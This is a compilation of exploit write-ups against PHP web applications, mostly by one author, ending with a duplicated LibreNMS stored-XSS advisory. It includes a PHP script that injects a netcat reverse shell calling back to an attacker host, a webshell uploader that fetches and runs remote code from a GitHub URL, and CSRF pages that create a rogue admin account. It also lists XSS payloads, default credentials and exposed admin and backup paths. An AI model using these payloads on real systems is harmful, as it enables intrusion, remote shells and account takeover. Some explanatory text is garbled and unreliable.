Tourism Management System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /rate_review.php?id=1"><script>alert(/indoushka/)</script>[+] http://localhost/tourism/rate_review.php?id=1%22%3E%3Cscript%3Ealert(/indoushka/)%3C/script%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tourism Management System 1.0 Cross Site Scripting

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : TitanNit Web Control 2.01 / Atemio 7600 php code injection Vulnerability                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sat-world.com/Atemio-AM-520-HD-TitanNit-Edition                                                                 |  
=============================================================================================================================================

poc :

[+] Explanation: 

    We used the exec function to run the nc(netcat) command which subscribes to the subscriptions offered by the privileged execution.

    In Windows environments, you can use the netcat tool for communications headsets.

    Note: Make sure that netcat is installed on your system (you can download netcat for Windows). 

   [+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload : 

<?php

class RemoteControl {

    private $timeout = 10;  
    private $target;  
    private $callback;  
    private $path = "/query?getcommand=&cmd=";  
    private $lport;  
    private $cmd;

    public function beacon() {  
        $this->cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc ";  
        $this->cmd .= $this->callback . " ";  
        $this->cmd .= $this->lport . " ";  
        $this->cmd .= ">/tmp/j";  
        $this->path .= $this->cmd;

        $ch = curl_init($this->target . $this->path);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
        curl_exec($ch);  
        curl_close($ch);  
    }

    public function slusaj() {  
        echo "[*] Listening on port " . $this->lport . "\n";  
        sleep(1);

        // Windows solution using exec  
        $cmd = "nc -lvp " . $this->lport; // Example with netcat listener  
        exec($cmd, $output, $result_code);

                if ($result_code == 0) {  
            echo "[*] Rootshell session opened\n";  
            foreach ($output as $line) {  
                echo $line . "\n";  
            }  
        } else {  
            echo "[!] Error in executing the listener\n";  
        }  
    }

    public function tajmer() {  
        for ($z = $this->timeout; $z > 0; $z--) {  
            echo "[*] Callback waiting: " . $z . "s\r";  
            sleep(1);  
        }  
    }

    public function thricer() {  
        echo "[*] Starting callback listener\n";

        // Run listener in the background using exec  
        $this->slusaj();

        echo "[*] Generating callback payload\n";  
        sleep(1);  
        echo "[*] Calling\n";  
        $this->beacon();  
    }

    public function howto($argv) {  
        if (count($argv) != 4) {  
            $this->usage();  
        } else {  
            $this->target = $argv[1];  
            $this->callback = $argv[2];  
            $this->lport = (int)$argv[3];

            if (strpos($this->target, "http") === false) {  
                $this->target = "http://" . $this->target;  
            }  
        }  
    }

    public function dostabesemolk() {

    }

    public function usage() {  
        $this->dostabesemolk();  
        echo "Usage: php titan.php <target ip> <listen ip> <listen port>\n";  
        echo "Example: php titan.php 192.168.1.13:20000 192.168.1.8 9999\n";  
        exit(0);  
    }

    public function main($argv) {  
        $this->howto($argv);  
        $this->thricer();  
    }  
}

$control = new RemoteControl();  
$control->main($argv);  
?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

Teacher Subject Allocation Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 Insecure Settings Vulnerability                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/tsas/admin/login.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Teacher Subject Allocation Management System 1.0 Insecure Settings

Task Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Task Management System 1.0 php code injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP code is designed to create a file and inject PHP code.[+] save payload as poc.php [+] usage : C:\www\test>php poc.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'firstname' => 'az',        'lastname' => 'azgt',        'email' => 'az@gt.gt',        'password' => 'az@gtgt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $target_ip/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Task Management System 1.0 Code Injection

Supply Chain Management version 1.0 suffers from a backup disclosure vulnerability.

    =============================================================================================================================================| # Title     : Supply Chain Management v1.0 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Supply_Chain_Management_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /backup/[+] Panel : http://127.0.0.1/scm-master/backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Supply Chain Management 1.0 Backup Disclosure

Event Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Event Management System v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202302/kashipara.com_event-mgt-sys-zip.zip                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] Use Payload : /admin/gallary.php[+] http://127.0.0.1/event_mgt_sys/admin/gallary.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Event Management System 1.0 Insecure Direct Object Reference

Student Attendance Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System v1.0 Insecure Settings Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Attendance Management System 1.0 Insecure Settings

Printing Business Records Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Printing Business Records Management System v1.0 CSRF Add ADmin Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_pbrms-0-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/pbrms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Printing Business Records Management System 1.0 Cross Site Request Forgery

Online Eyewear Shop version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Online Eyewear Shop v1.0 CSRF Add ADmin Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_php-oews-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/oews/admin/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online Eyewear Shop 1.0 Cross Site Request Forgery

### Summary
A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.

### Details
The vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed.

For instance, the following payload can be used to trigger the XSS:
```test1<script>{onerror=alert}throw 1337</script>```

When the page containing the transport details is loaded, this payload causes the browser to execute the injected script, which in this case triggers an alert popup.

The root cause of the vulnerability is that the application does not sanitize the value of $instance->displayDetails before appending it to the HTML output. This is demonstrated in the following code:
https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40

### PoC
1. Create a new alert transport in the LibreNMS interface.
2. Depending on the transport chosen, just input the following payload in any field that ends up in the "Details" section:
```test1<script>{onerror=alert}throw 1337</script>```
3. Save the transport and trigger the alert.
4. When the transport details are accessed, the injected script executes, displaying an alert popup.

Example Request:

```http
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>

_token=<your_token>&transport_id=2&type=alert-transports&name=Test1&transport-choice=canopsis-form&_token=Ep6belaqXe5qE301CGmtoOWJ71gvRfBXjRyhXEpH&transport-type=canopsis&canopsis-host=localhost%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&canopsis-port=5000&canopsis-user=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&canopsis-pass=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&canopsis-vhost=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E
```

### Impact
It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.


**Summary**

A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.

**Details**

The vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed.

For instance, the following payload can be used to trigger the XSS:  
test1<script>{onerror=alert}throw 1337</script>

When the page containing the transport details is loaded, this payload causes the browser to execute the injected script, which in this case triggers an alert popup.

The root cause of the vulnerability is that the application does not sanitize the value of $instance->displayDetails before appending it to the HTML output. This is demonstrated in the following code:  
https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40

**PoC**

1.  Create a new alert transport in the LibreNMS interface.
2.  Depending on the transport chosen, just input the following payload in any field that ends up in the "Details" section:  
    test1<script>{onerror=alert}throw 1337</script>
3.  Save the transport and trigger the alert.
4.  When the transport details are accessed, the injected script executes, displaying an alert popup.

Example Request:

POST /ajax\_form.php HTTP/1.1
Host: <your\_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your\_XSRF\_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your\_cookie>

\_token=<your\_token>&transport\_id=2&type=alert-transports&name=Test1&transport-choice=canopsis-form&\_token=Ep6belaqXe5qE301CGmtoOWJ71gvRfBXjRyhXEpH&transport-type=canopsis&canopsis-host=localhost%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&canopsis-port=5000&canopsis-user=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&canopsis-pass=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&canopsis-vhost=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E

**Impact**

It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.

**References**

*   GHSA-7f84-28qh-9486
*   librenms/librenms@ee1afba
*   https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40
*   https://nvd.nist.gov/vuln/detail/CVE-2024-47523

Tag

#php